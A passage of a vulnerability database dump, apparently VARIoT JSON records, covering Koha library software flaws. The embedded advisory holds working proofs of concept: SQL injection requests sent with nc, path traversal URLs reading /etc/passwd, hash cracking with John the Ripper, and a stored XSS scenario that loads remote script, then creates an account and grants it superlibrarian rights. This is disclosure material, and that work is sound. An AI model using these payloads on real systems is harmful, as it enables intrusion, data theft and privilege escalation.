Feed john the ripper and be lucky\n\n\u00a0 \u00a0root@kali:/home/wicked# echo \"$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\" \u003e ./admin-pass\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass\u00a0\n\u00a0 \u00a0Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])\n\u00a0 \u00a0admin \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(?)\n\u00a0 \u00a0guesses: 1 \u00a0time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) \u00a0c/s: 260 \u00a0trying: Smokey - allstate\n\u00a0 \u00a0Use the \"--show\" option to display all of the cracked passwords reliably\n\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass --show\n\u00a0 \u00a0?:admin\n\n\u00a0 \u00a01 password hash cracked, 0 left\n\n4. If the webserver is misconfigured, read \u0026 write access to the filesystem may be possible. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n====================================================================\n1. 
\"Criteria\" Parameter, Payload: ELT(1=1,\u0027evil\u0027) / ELT(1=2,\u0027evil\u0027)\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=2,\u0027evil\u0027)\" | nc testbox 9002\n\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=1,\u0027evil\u0027)\" | nc testbox 9002\n\n====================================================================\n2. 
\"Filter\" Parameter, Payload: P_COM\u0027+AND+\u0027a\u0027=\u0027a / P_COM\u0027+AND+\u0027a\u0027=\u0027b\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027a\" | nc testbox 9002\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027b\" | nc testbox 9002\n\n====================================================================\n\nYou will notice different output in every second request, demonstrating the evaluation of the payload. \n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n3. Path Traversal (CVE-2015-4633)\n=================================\n\nVulnerability\n-------------\nThe \"template_path\" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal. 
\n\nReferences\n----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nThe following input is used to print out /etc/passwd:\n\n/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n4. The site also lacks in the implementation of challenge tokens that prevent cross-site\u00a0\nforgery (XSRF) attacks. \u00a0\n\nThe attack can be performed by:\n\n- through a compromised user account. 
User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)\n- through a user clicking a malicious link (phishing mail, forum link etc.)\n\nThe following pages are affected from stored XSS flaws:\n\n/cgi-bin/koha/opac-shelves.pl\n/cgi-bin/koha/virtualshelves/shelves.pl\n\nThe following pages are affected from relfective XSS flaws:\n\n/cgi-bin/koha/opac-shelves.pl \t\t\t\t(parameters: \"direction\", \"display\")\n/cgi-bin/koha/opac-search.pl \t\t\t\t        (parameters: \"tag\")\n/cgi-bin/koha/authorities/authorities-home.pl \t\t(parameters: \"value\")\u00a0\n/cgi-bin/koha/acqui/lateorders.pl \t\t\t        (parameters: \"delay\")\n/cgi-bin/koha/admin/auth_subfields_structure.pl \t(parameters: \"authtypecode\",\"tagfield\")\n/cgi-bin/koha/admin/marc_subfields_structure.pl\t(parameters: \"tagfield\")\n/cgi-bin/koha/catalogue/search.pl\t\t\t        (parameters: \"limit\")\n/cgi-bin/koha/serials/serials-search.pl\t\t\t(parameters: \"bookseller_filter\", \"callnumber_filter\", \"EAN_filter\", \"ISSN_filter\", \"publisher_filter\", \"title_filter\")\u00a0\n/cgi-bin/koha/suggestion/suggestion.pl \t\t\t(parameters: \"author\", \"collectiontitle\", \"copyrightdate\", \"isbn\", \"manageddate_from\", \"manageddate_to\", \"publishercode\", \n                                                                                                        \"suggesteddate_from\", \"suggesteddate_to\")\n\nImpact\n----------\nThe vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:\n\n- escalate privileges by targeting staff members with XSRF\u00a0\n- target users via browser exploits\n- target the webserver by combining with other server-side vulnerabilities. 
\u00a0\n\nReferences\n----------------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\n# ################################################################################################## #\n# PoC / Attack Scenario: \t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nAlice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:\n\n--\u003e http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=Malicious+Input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0\n\nBob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens\u00a0\n\n--\u003e http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl\n\nthe malcious code get\u0027s executed. The code can then perform any unauthorized actions with the pemissions of user bob. 
For example:\n\nCreate new user:\n-----------------------\n\n--\u003e http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026B_address=\u0026B_address2=\u0026B_city=\u0026B_state=\u0026B_zipcode=\u0026B_country=\u0026B_phone=\u0026B_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress\u0026category_type=A\u0026updtype=I\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2F06%2F2000\u0026address=fictional\u0026select_city=%7C%7C%7C\u0026cardnumber=9182734629182364\u0026branchcode=MAURES\u0026categorycode=P_COM\u0026dateenrolled=24%2F06%2F2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=PROFESSION\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=Save\u0026setting_extended_patron_attributes=1\n\nGive the new user superlibririan permission:\n----------------------------------------------------------\n\n--\u003e http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian\n\nThe attacker can now log as superlibrarian. \n\nSide Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. 
\nAlice needs to have access to the OPAC interface and to have permissions to create public lists. \n\n# ################################################################################################## #\n# PoC / Attack Scenario End\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n\n\n\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-4633"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      }
    ],
    "trust": 4.68
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "75426",
        "trust": 3.9
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4633",
        "trust": 2.8
      },
      {
        "db": "PACKETSTORM",
        "id": "132458",
        "trust": 1.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "37387",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4633"
      }
    ]
  },
  "id": "VAR-201810-0026",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      }
    ],
    "trust": 3.5804196
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 3.0
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:52:48.222000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug 14412",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
      },
      {
        "title": "Bug 14426",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
      },
      {
        "title": "Koha 3.14.16 released",
        "trust": 0.8,
        "url": "https://koha-community.org/koha-3-14-16-released/"
      },
      {
        "title": "Security Release - Koha 3.16.12",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-16-12/"
      },
      {
        "title": "Security Release - Koha 3.18.8",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-18-8/"
      },
      {
        "title": "Security Release - Koha 3.20.1",
        "trust": 0.8,
        "url": "https://koha-community.org/security-release-koha-3-20-1/"
      },
      {
        "title": "Koha directory traversal vulnerability patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62257"
      },
      {
        "title": "Patch for Koha cross-site request forgery vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62260"
      },
      {
        "title": "Koha HTML Injection Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62258"
      },
      {
        "title": "Patch for Koha Cross-Site Scripting Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62259"
      },
      {
        "title": "Patch for Koha SQL Injection Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/62255"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4633"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.6,
        "url": "http://www.securityfocus.com/bid/75426"
      },
      {
        "trust": 2.4,
        "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
      },
      {
        "trust": 2.0,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
      },
      {
        "trust": 2.0,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/security-release-koha-3-16-12/"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/security-release-koha-3-18-8/"
      },
      {
        "trust": 1.7,
        "url": "https://koha-community.org/security-release-koha-3-20-1/"
      },
      {
        "trust": 1.6,
        "url": "https://koha-community.org/koha-3-14-16-released/"
      },
      {
        "trust": 1.6,
        "url": "https://packetstormsecurity.com/files/132458/koha-ils-3.20.x-csrf-xss-traversal-sql-injection.html"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/fulldisclosure/2015/jun/80"
      },
      {
        "trust": 1.6,
        "url": "https://www.exploit-db.com/exploits/37387/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4633"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4633"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
      },
      {
        "trust": 0.4,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026b_address=\u0026b_address2=\u0026b_city=\u0026b_state=\u0026b_zipcode=\u0026b_country=\u0026b_phone=\u0026b_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026borrowermandatoryfield=surname%7cdateofbirth%7ccardnumber%7caddress\u0026category_type=a\u0026updtype=i\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2f06%2f2000\u0026address=fictional\u0026select_city=%7c%7c%7c\u0026cardnumber=9182734629182364\u0026branchcode=maures\u0026categorycode=p_com\u0026dateenrolled=24%2f06%2f2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=profession\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=save\u0026setting_extended_patron_attributes=1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4632"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4631"
      },
      {
        "trust": 0.1,
        "url": "http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian"
      },
      {
        "trust": 0.1,
        "url": "http://wiki.koha-community.org/wiki/sql_reports_library#superlibrarians"
      },
      {
        "trust": 0.1,
        "url": "http://www.koha-community.org/"
      },
      {
        "trust": 0.1,
        "url": "http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl"
      },
      {
        "trust": 0.1,
        "url": "http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=malicious+input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0"
      },
      {
        "trust": 0.1,
        "url": "http://sqlmap.org"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4633"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      },
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4633"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "BID",
        "id": "75426"
      },
      {
        "date": "2019-01-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      },
      {
        "date": "2015-06-26T23:02:22",
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      },
      {
        "date": "2018-10-18T21:29:01.800000",
        "db": "NVD",
        "id": "CVE-2015-4633"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "date": "2015-08-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "date": "2015-06-25T00:00:00",
        "db": "BID",
        "id": "75426"
      },
      {
        "date": "2019-01-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      },
      {
        "date": "2018-11-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      },
      {
        "date": "2024-11-21T02:31:26.750000",
        "db": "NVD",
        "id": "CVE-2015-4633"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "132458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha SQL Injection Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      }
    ],
    "trust": 0.6
  }
}

var-202001-1231
Vulnerability from variot

SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924. Koha contains an SQL injection vulnerability. Information may be obtained or altered, and a denial of service (DoS) condition may result. Koha is prone to the following security vulnerabilities: 1. An arbitrary file-access vulnerability 2. A directory-traversal vulnerability 3. An arbitrary file-write vulnerability 4. An SQL-injection vulnerability. An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1231",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.08.23"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.12.10"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.10.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.12.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.03"
      },
      {
        "model": "koha",
        "scope": "lt",
